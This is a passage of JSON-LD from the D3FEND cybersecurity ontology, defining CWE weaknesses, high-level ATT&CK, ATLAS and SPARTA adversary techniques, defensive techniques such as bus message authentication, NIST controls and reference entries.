      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-614",
      "d3f:definition": "The Secure attribute for sensitive cookies in HTTPS sessions is not set, which could cause the user agent to send those cookies in plaintext over an HTTP session.",
      "rdfs:label": "Sensitive Cookie in HTTPS Session Without 'Secure' Attribute",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-319"
      }
    },
    {
      "@id": "d3f:T1562.007",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1562.007",
      "d3f:definition": "Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004).",
      "d3f:modifies": {
        "@id": "d3f:CloudConfiguration"
      },
      "rdfs:label": "Disable or Modify Cloud Firewall",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1562"
        },
        {
          "@id": "_:N026ce6ded7fb46d5825b49a10b562322"
        }
      ]
    },
    {
      "@id": "_:N026ce6ded7fb46d5825b49a10b562322",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CloudConfiguration"
      }
    },
    {
      "@id": "d3f:T1560.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1560.001",
      "d3f:creates": {
        "@id": "d3f:ArchiveFile"
      },
      "d3f:definition": "Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport.",
      "rdfs:label": "Archive via Utility",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1560"
        },
        {
          "@id": "_:Nd8f3aa02c8064f3089722d3457d3c8b8"
        }
      ]
    },
    {
      "@id": "_:Nd8f3aa02c8064f3089722d3457d3c8b8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ArchiveFile"
      }
    },
    {
      "@id": "d3f:SoftwareWatchdogTimer",
      "@type": "owl:Class",
      "d3f:definition": "A software watchdog timer is a watchdog timer implemented in software.",
      "rdfs:label": "Software Watchdog Timer",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:RuntimeVariable"
        },
        {
          "@id": "d3f:SoftwareTimer"
        },
        {
          "@id": "d3f:WatchdogTimer"
        }
      ]
    },
    {
      "@id": "d3f:CWE-28",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-28",
      "d3f:definition": "The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize \"..\\\" sequences that can resolve to a location that is outside of that directory.",
      "rdfs:label": "Path Traversal: '..\\filedir'",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-23"
      }
    },
    {
      "@id": "d3f:T1553.006",
      "@type": "owl:Class",
      "d3f:attack-id": "T1553.006",
      "d3f:definition": "Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. Code signing provides a level of authenticity on a program from a developer and a guarantee that the program has not been tampered with. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on an operating system.",
      "rdfs:label": "Code Signing Policy Modification",
      "rdfs:subClassOf": {
        "@id": "d3f:T1553"
      }
    },
    {
      "@id": "d3f:DE-0003.08",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "DE-0003.08",
      "d3f:definition": "Spacecraft typically maintain histories of accepted, rejected, and executed commands, buffers, logs, or file records that can be downlinked on demand or periodically. An adversary conceals activity by editing or pruning these artifacts: removing entries, altering opcodes or arguments, rewriting timestamps and source identifiers, rolling logs early, or repopulating with benign-looking commands to balance counters. Related acknowledgments and event records may be suppressed or reclassified so cross-checks appear consistent. After manipulation, the official command history shows a plausible narrative that omits or mischaracterizes the adversary’s actions.",
      "d3f:modifies": {
        "@id": "d3f:CommandHistoryLog"
      },
      "rdfs:label": "Received Commands - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0003/08/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DE-0003"
        },
        {
          "@id": "_:N40a1f5515778431a905cb6496eea7c0b"
        }
      ],
      "skos:prefLabel": "Received Commands"
    },
    {
      "@id": "_:N40a1f5515778431a905cb6496eea7c0b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CommandHistoryLog"
      }
    },
    {
      "@id": "d3f:T1546.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1546.002",
      "d3f:creates": {
        "@id": "d3f:ExecutableFile"
      },
      "d3f:definition": "Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in <code>C:\\Windows\\System32\\</code>, and <code>C:\\Windows\\sysWOW64\\</code>  on 64-bit Windows systems, along with screensavers included with base Windows installations.",
      "d3f:modifies": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      },
      "rdfs:label": "Screensaver",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1546"
        },
        {
          "@id": "_:Nb07f35ecd4a247deb47f572fa9951079"
        },
        {
          "@id": "_:N16a9d6e560c64104b624a289cdbf7d31"
        }
      ]
    },
    {
      "@id": "_:Nb07f35ecd4a247deb47f572fa9951079",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableFile"
      }
    },
    {
      "@id": "_:N16a9d6e560c64104b624a289cdbf7d31",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      }
    },
    {
      "@id": "d3f:CWE-1083",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1083",
      "d3f:definition": "The product is intended to manage data access through a particular data manager component such as a relational or non-SQL database, but it contains code that performs data access operations without using that component.",
      "rdfs:label": "Data Access from Outside Expected Data Manager Component",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1061"
      }
    },
    {
      "@id": "d3f:T0882",
      "@type": "owl:Class",
      "d3f:attack-id": "T0882",
      "d3f:definition": "Adversaries may steal operational information on a production environment as a direct mission outcome for personal gain or to inform future operations. This information may include design documents, schedules, rotational data, or similar artifacts that provide insight on operations.    In the Bowman Dam incident, adversaries probed systems for operational data. (Citation: Mark Thompson March 2016) (Citation: Danny Yadron December 2015)",
      "rdfs:label": "Theft of Operational Information - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSImpactTechnique"
      },
      "skos:prefLabel": "Theft of Operational Information"
    },
    {
      "@id": "d3f:DatabaseFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:Database"
      },
      "d3f:definition": "A file that stores data and metadata in an organized format, managed by a database management system.",
      "rdfs:label": "Database File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:File"
        },
        {
          "@id": "_:N7142ee940fde434eb324c022aa6ef681"
        }
      ]
    },
    {
      "@id": "_:N7142ee940fde434eb324c022aa6ef681",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Database"
      }
    },
    {
      "@id": "d3f:AuthenticationService",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:authenticates": {
        "@id": "d3f:Host"
      },
      "d3f:definition": "An authentication service is a mechanism, analogous to the use of passwords on time-sharing systems, for the secure authentication of the identity of network clients by servers and vice versa, without presuming the operating system integrity of either (e.g., Kerberos).",
      "rdfs:isDefinedBy": {
        "@id": "https://www.gartner.com/en/information-technology/glossary/authentication-service"
      },
      "rdfs:label": "Authentication Service",
      "rdfs:seeAlso": {
        "@id": "dbr:Authentication"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ServiceApplicationProcess"
        },
        {
          "@id": "_:N1a0d2f9aa09c415d83bbb61ef24bca61"
        }
      ]
    },
    {
      "@id": "_:N1a0d2f9aa09c415d83bbb61ef24bca61",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:authenticates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Host"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-4_1",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Information Flow Enforcement | Object Security and Privacy Attributes",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "rdfs:label": "AC-4(1)"
    },
    {
      "@id": "d3f:PageTable",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": [
        {
          "@id": "d3f:PhysicalAddress"
        },
        {
          "@id": "d3f:VirtualAddress"
        }
      ],
      "d3f:definition": "A page table is the data structure used by the MMU in a virtual memory computer system to store the mapping between virtual addresses (virtual pages) and physical addresses (page frames).",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Page_table"
      },
      "rdfs:label": "Page Table",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:N8c2e867cf84c46858a77bb599d712d84"
        },
        {
          "@id": "_:Nca4cec30d93a4fb588157ad0289ee11a"
        }
      ]
    },
    {
      "@id": "_:N8c2e867cf84c46858a77bb599d712d84",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PhysicalAddress"
      }
    },
    {
      "@id": "_:Nca4cec30d93a4fb588157ad0289ee11a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:VirtualAddress"
      }
    },
    {
      "@id": "d3f:monitors",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x monitors y: The technique or agent x keeps tabs on, keeps an eye on, or keeps the digital artifact y under surveillance.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/02167732-v"
      },
      "rdfs:label": "monitors",
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:detects"
        }
      ]
    },
    {
      "@id": "d3f:Reference-CAR-2020-11-005%3AClearPowershellConsoleCommandHistory_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2020-11-005/"
      },
      "d3f:kb-abstract": "Adversaries may attempt to conceal their tracks by deleting the history of commands run within the Powershell console, or turning off history saving to begin with. This analytic looks for several commands that would do this. This does not capture the event if it is done within the console itself; only commandline-based commands are detected. Note that the command to remove the history file directly may vary a bit if the history file is not saved in the default path on a particular system.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2020-11-005: Clear Powershell Console Command History",
      "rdfs:label": "Reference - CAR-2020-11-005: Clear Powershell Console Command History - MITRE"
    },
    {
      "@id": "d3f:CCI-000185_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system, for PKI-based authentication, validates certifications by constructing and verifying a certification path to an accepted trust anchor including checking certificate status information.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:CredentialHardening"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-15T00:00:00"
      },
      "rdfs:label": "CCI-000185"
    },
    {
      "@id": "d3f:writes",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x writes y: The subject x takes the action of writing to a digital artifact y to store data and place it into persistent memory for later reference.",
      "rdfs:label": "writes",
      "rdfs:seeAlso": {
        "@id": "http://wordnet-rdf.princeton.edu/id/01000931-v"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:accesses"
      }
    },
    {
      "@id": "d3f:Reference-NIST-Special-Publication-800-53-Revision-5",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://doi.org/10.6028/NIST.SP.800-53r5"
      },
      "d3f:kb-abstract": "This publication provides a catalog of security and privacy controls for information systems and organizations to protect organizational operations and assets, individuals, other organizations, and the Nation from a diverse set of threats and risks, including hostile attacks, human errors, natural disasters, structural failures, foreign intelligence entities, and privacy risks. The controls are flexible and customizable and implemented as part of an organization-wide process to manage risk. The controls address diverse requirements derived from mission and business needs, laws, executive orders, directives, regulations, policies, standards, and guidelines. Finally, the consolidated control catalog addresses security and privacy from a functionality perspective (i.e., the strength of functions and mechanisms provided by the controls) and from an assurance perspective (i.e., the measure of confidence in the security or privacy capability provided by the controls). Addressing functionality and assurance helps to ensure that information technology products and the systems that rely on those products are sufficiently trustworthy.",
      "d3f:kb-organization": "NIST",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:AccessPolicyAdministration"
        },
        {
          "@id": "d3f:Endpoint-basedWebServerAccessMediation"
        },
        {
          "@id": "d3f:NetworkResourceAccessMediation"
        },
        {
          "@id": "d3f:PasswordAuthentication"
        },
        {
          "@id": "d3f:Proxy-basedWebServerAccessMediation"
        },
        {
          "@id": "d3f:RemoteFileAccessMediation"
        },
        {
          "@id": "d3f:WebSessionAccessMediation"
        }
      ],
      "d3f:kb-reference-title": "NIST Special Publication 800-53 Revision 5 - Security and Privacy Controls for Information Systems and Organizations",
      "rdfs:label": "Reference - NIST Special Publication 800-53 Revision 5 - Security and Privacy Controls for Information Systems and Organizations"
    },
    {
      "@id": "d3f:HardwareDeviceDisabledEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a device transitions to an inactive or unavailable state, often due to deactivation, failure, or maintenance.",
      "rdfs:label": "Hardware Device Disabled Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDeviceStateEvent"
        },
        {
          "@id": "_:N9c22dd1a44204bb9ada263302ef588f1"
        }
      ]
    },
    {
      "@id": "_:N9c22dd1a44204bb9ada263302ef588f1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareDeviceEnabledEvent"
      }
    },
    {
      "@id": "d3f:CallStack",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:StackFrame"
      },
      "d3f:definition": "In computer science, a call stack is a stack data structure that stores information about the active subroutines of a computer program. This kind of stack is also known as an execution stack, program stack, control stack, run-time stack, or machine stack, and is often shortened to just \"the stack\". Although maintenance of the call stack is important for the proper functioning of most software, the details are normally hidden and automatic in high-level programming languages. Many computer instruction sets provide special instructions for manipulating stacks.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Call_stack"
      },
      "rdfs:label": "Call Stack",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:N186e7bbdc47a48c7addbc303e02d05f8"
        }
      ]
    },
    {
      "@id": "_:N186e7bbdc47a48c7addbc303e02d05f8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:StackFrame"
      }
    },
    {
      "@id": "d3f:TA0035",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Collection - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Collection"
    },
    {
      "@id": "d3f:T1632",
      "@type": "owl:Class",
      "d3f:attack-id": "T1632",
      "d3f:definition": "Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted applications. Operating systems and security products may contain mechanisms to identify programs or websites as possessing some level of trust. Examples of such features include: an app being allowed to run because it is signed by a valid code signing certificate; an OS prompt alerting the user that an app came from an untrusted source; or getting an indication that you are about to connect to an untrusted site. The method adversaries use will depend on the specific mechanism they seek to subvert.",
      "rdfs:label": "Subvert Trust Controls - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
      },
      "skos:prefLabel": "Subvert Trust Controls"
    },
    {
      "@id": "d3f:Correlation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-COR",
      "d3f:definition": "Correlation is the degree to which two or more quantities are linearly associated.",
      "d3f:kb-article": "Wolfram MathWorld. (n.d.). Correlation. [Link](https://mathworld.wolfram.com/Correlation.html)",
      "rdfs:label": "Correlation",
      "rdfs:subClassOf": {
        "@id": "d3f:DescriptiveStatistics"
      }
    },
    {
      "@id": "d3f:BusMessageAuthentication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:BusMessageAuthentication"
      ],
      "d3f:authenticates": {
        "@id": "d3f:BusMessage"
      },
      "d3f:d3fend-id": "D3-BMA",
      "d3f:definition": "Applies cryptographic primitives to individual bus frames to verify the sender's identity and ensure the integrity of the data payload.",
      "d3f:kb-article": "## How it works\nBus Message Authentication functions as a continuous validation layer that operates between the physical transmission of a signal and the application layer's processing of data. Every node on a bus network is provisioned with a cryptographic key and a synchronized 'freshness' state (such as a monotonic counter). When a node prepares to transmit, it generates a Message Authentication Code (MAC) which is created by hashing the message content, the sender's unique ID, and the current freshness value using its secret key. This MAC is then appended to the outgoing frame.\n\nAs messages circulate on the bus network, receiving nodes do not immediately trust the incoming data. Instead, a hardware controller intercepts the frame and performs a real-time parallel verification. The controller re-calculates the expected MAC based on its own copy of the key and the current network freshness state. If the received MAC matches the calculated one, the message is passed to the system for further action. If the MAC is missing, incorrect, or stale (indicating a replay of an older message), the hardware silently drops the frame or triggers a security alert.\n\n## Considerations\n* Bandwidth Overhead: Adding authentication tags (MACs) and freshness values reduces the effective data throughput; this requires a trade-off between the desired security level (tag length) and the available bus capacity.\n\n* Real-Time Latency: Cryptographic processing must occur in hardware (e.g., via AES-NI, FPGA logic, or specialized ASICs) to meet the deterministic timing constraints of safety-critical systems.\n\n* Key Management: A robust mechanism for secure key storage and lifecycle management (e.g., rotation and revocation) is required to ensure that a single compromised node does not jeopardize the entire network.\n\n* Protocol Transparency: In legacy environments, authentication must often be implemented as a shim that remains compatible with existing protocol standards to avoid breaking legacy hardware.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-ControllerAreaNetworkMessageAuthentication"
      },
      "rdfs:label": "Bus Message Authentication",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:MessageAuthentication"
        },
        {
          "@id": "_:N4c3554aff8154eedac99923e6053ffb4"
        }
      ]
    },
    {
      "@id": "_:N4c3554aff8154eedac99923e6053ffb4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:authenticates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BusMessage"
      }
    },
    {
      "@id": "d3f:SARSA",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SAR",
      "d3f:definition": "State-action-reward-state-action (SARSA) is an algorithm for learning a Markov decision process policy, used in the reinforcement learning area of machine learning.",
      "d3f:kb-article": "## References\nState-action-reward-state-action. Wikipedia.  [Link](https://en.wikipedia.org/wiki/State%E2%80%93action%E2%80%93reward%E2%80%93state%E2%80%93action).",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/page/State%E2%80%93action%E2%80%93reward%E2%80%93state%E2%80%93action"
      },
      "rdfs:label": "SARSA",
      "rdfs:subClassOf": {
        "@id": "d3f:Model-freeReinforcementLearning"
      }
    },
    {
      "@id": "d3f:T1525",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:adds": {
        "@id": "d3f:ContainerImage"
      },
      "d3f:attack-id": "T1525",
      "d3f:definition": "Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)",
      "rdfs:label": "Implant Internal Image",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "_:Nf1661e985600499c92bd3a71f73e6c02"
        }
      ]
    },
    {
      "@id": "_:Nf1661e985600499c92bd3a71f73e6c02",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:adds"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ContainerImage"
      }
    },
    {
      "@id": "d3f:Reference-DecoyAndDeceptiveDataObjectTechnology_Cymmetria,Inc.",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20170134423A1"
      },
      "d3f:kb-abstract": "A computer implemented method of detecting unauthorized access to a protected network by monitoring a dynamically updated deception environment, comprising launching, on one or more decoy endpoints, one or more decoy operating system (OS) managing one or more of a plurality of deception applications mapping a plurality of applications executed in a protected network, updating dynamically a usage indication for a plurality of deception data objects deployed in the protected network to emulate usage of the plurality of deception data objects for accessing the deception application(s) wherein the plurality of deception data objects are configured to trigger an interaction with the deception application(s) when used, detecting usage of data contained in the deception data object(s) by monitoring the interaction and identifying one or more potential unauthorized operations based on analysis of the detection.\n\nIn order to convince the potential attacker that the deception environment is the real (valid) processing environment and/or part thereof, the campaign manager may construct the false identity according to the public information of the certain user that may typically be available to the potential attacker. By exposing the real (public) information of the certain user to the potential attacker, the false identity may seem consistent and legitimate to the potential attacker. For example, the campaign manager may create a false account, for example, a Facebook account of the certain user that includes the same public information that is publicly available to other Facebook users from the real (genuine) Facebook account of the certain user. The fake company account may include information specific to the role and/or job title of certain user within the company, for example, a programmer, an accountant, an IT person and/or the like.",
      "d3f:kb-author": "Dean Sysman, Gadi Evron, Imri Goldberg, Itamar Sher, Shmuel Ur",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Cymmetria, Inc.",
      "d3f:kb-reference-of": {
        "@id": "d3f:DecoyPersona"
      },
      "d3f:kb-reference-title": "Decoy and deceptive data object technology",
      "rdfs:label": "Reference - Decoy and deceptive data object technology - Cymmetria, Inc."
    },
    {
      "@id": "d3f:DirectPhysicalLinkMapping",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DirectPhysicalLinkMapping"
      ],
      "d3f:d3fend-id": "D3-DPLM",
      "d3f:definition": "Direct physical link mapping creates a physical link map by direct observation and recording of the physical network links.",
      "d3f:kb-article": "## How it works\n\nDirect Physical Link Mapping involves a manual process where a network engineer or administrator physically observes and documents the physical connections within the network infrastructure.\n\n## Considerations\n\n* Constructing and maintaining physical topologies for extensive networks can be challenging and time-consuming using manual methods. Therefore, where feasible, automated methods like active physical link mapping should be considered as a partial or complete solution for physical link mapping processes.\n\n* In scenarios where active physical link mapping is not an option, physical inspection of networks is necessary to accomplish physical link mapping. This is due to the lack of reliable techniques to accurately map physical links solely through passive network traffic monitoring.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-NetworkMapping"
      },
      "d3f:synonym": "Manual Physical Link Mapping",
      "rdfs:label": "Direct Physical Link Mapping",
      "rdfs:seeAlso": {
        "@id": "https://en.wikipedia.org/wiki/Transmission_medium"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PhysicalLinkMapping"
      }
    },
    {
      "@id": "d3f:OTReadFileCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Reads data in specified chunks or the contents of a specified file stored in the file device connected to the PC.",
      "rdfs:label": "OT Read File Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTReadCommandEvent"
        },
        {
          "@id": "_:Nf4ee8b7db2f54f6e9fd18244d4365199"
        },
        {
          "@id": "_:Nce2d1f84b73f464a9fdc10fdc0b24e50"
        }
      ]
    },
    {
      "@id": "_:Nf4ee8b7db2f54f6e9fd18244d4365199",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "_:Nce2d1f84b73f464a9fdc10fdc0b24e50",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTReadFileCommand"
      }
    },
    {
      "@id": "d3f:AML.T0049",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0049",
      "d3f:definition": "Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other applications with Internet accessible open sockets, such as web servers and related services.",
      "rdfs:label": "Exploit Public-Facing Application - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0049"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASInitialAccessTechnique"
      },
      "skos:prefLabel": "Exploit Public-Facing Application"
    },
    {
      "@id": "d3f:FTPPollEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a client queries an FTP server to check for the presence of specific files or directories without initiating a transfer.",
      "rdfs:label": "FTP Poll Event",
      "rdfs:subClassOf": {
        "@id": "d3f:FTPEvent"
      }
    },
    {
      "@id": "d3f:Semi-supervisedFeatureExtraction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SSFE",
      "d3f:definition": "Feature extraction refers to reducing the number of dimensions in a data point so that it is computationally feasible and effective to learn a model.",
      "d3f:kb-article": "## References\nJashish Shrestha. (n.d.). Beginner's Guide to Semi-Supervised Learning. [Link](http://jashish.com.np/blog/posts/beginners-guide-to-semi-supervised-learning/)",
      "rdfs:label": "Semi-supervised Feature Extraction",
      "rdfs:subClassOf": {
        "@id": "d3f:UnsupervisedPreprocessing"
      }
    },
    {
      "@id": "d3f:CWE-1232",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1232",
      "d3f:definition": "Register lock bit protection disables changes to system configuration once the bit is set. Some of the protected registers or lock bits become programmable after power state transitions (e.g., Entry and wake from low power sleep modes) causing the system configuration to be changeable.",
      "rdfs:label": "Improper Lock Behavior After Power State Transition",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-667"
      }
    },
    {
      "@id": "d3f:NetworkResource",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In computing, a shared resource, or network share, is a computer resource made available from one host to other hosts on a computer network. It is a device or piece of information on a computer that can be remotely accessed from another computer, typically via a local area network or an enterprise intranet, transparently as if it were a resource in the local machine. Network sharing is made possible by inter-process communication over the network.",
      "rdfs:label": "Network Resource",
      "rdfs:seeAlso": {
        "@id": "dbr:Shared_resource"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RemoteResource"
      },
      "skos:altLabel": "Shared Resource"
    },
    {
      "@id": "d3f:CWE-401",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-401",
      "d3f:definition": "The product does not sufficiently track and release allocated memory after it has been used, making the memory unavailable for reallocation and reuse.",
      "d3f:synonym": "Memory Leak",
      "rdfs:label": "Missing Release of Memory after Effective Lifetime",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-772"
      }
    },
    {
      "@id": "d3f:CWE-1072",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1072",
      "d3f:definition": "The product accesses a data resource through a database without using a connection pooling capability.",
      "rdfs:label": "Data Resource Access without Use of Connection Pooling",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-405"
      }
    },
    {
      "@id": "d3f:T1623.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1623.001",
      "d3f:definition": "Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the underlying command prompts on Android and iOS devices. Unix shells can control every aspect of a system, with certain commands requiring elevated privileges that are only accessible if the device has been rooted or jailbroken.",
      "rdfs:label": "Unix Shell - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1623"
      },
      "skos:prefLabel": "Unix Shell"
    },
    {
      "@id": "d3f:LocalAttacker",
      "@type": "owl:Class",
      "d3f:definition": "An attacker who is physically near or on the premises of the target network or systems.",
      "rdfs:label": "Local Attacker",
      "rdfs:subClassOf": {
        "@id": "d3f:Attacker"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_SI-4_2",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "System Monitoring | Automated Tools and Mechanisms for Real-time Analysis",
      "d3f:member-of": {
